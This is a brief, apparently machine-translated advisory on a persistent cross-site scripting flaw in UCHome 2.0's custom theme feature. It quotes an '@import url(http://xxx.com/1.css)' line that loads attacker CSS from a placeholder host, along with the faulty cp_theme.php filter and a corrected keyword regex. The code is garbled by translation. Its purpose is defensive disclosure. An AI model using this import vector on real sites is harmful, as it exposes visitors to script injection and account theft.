Uchome 2.0 persistent XSS Cross-Site vulnerability and repair

When customizing the style of a personal homepage, You Can @ import an external css file.

The following tests IE6, IE7, and IE8 passed in uchome simplified UTF-8 2.0.
@ Import url (http://xxx.com/1.css); contains a remote cssfile that can be written to XSS in 1.css.
Analysis Code cp_theme.php 92 (17 lines)

 

Function checksecurity ($ str) {// execute a series of filters to verify whether the CSS $ filter = array (// * [] * (. +?) is valid ?) [] ** // Is,/[^ a-z0-9] +/I,); $ str = preg_replace ($ filter, $ str); // The filter is filtered, but it is only used for judgment and does not work for source input. if (preg_match ("/(expression | implode | javascript)/I", $ str )) {// The showmessage (css_contains_elements_of_insecurity) is not checked for import and http;} return true ;}

Solution: implode should be an import error.
Suggestions

/(Expression | vbscript | javascript | import)/I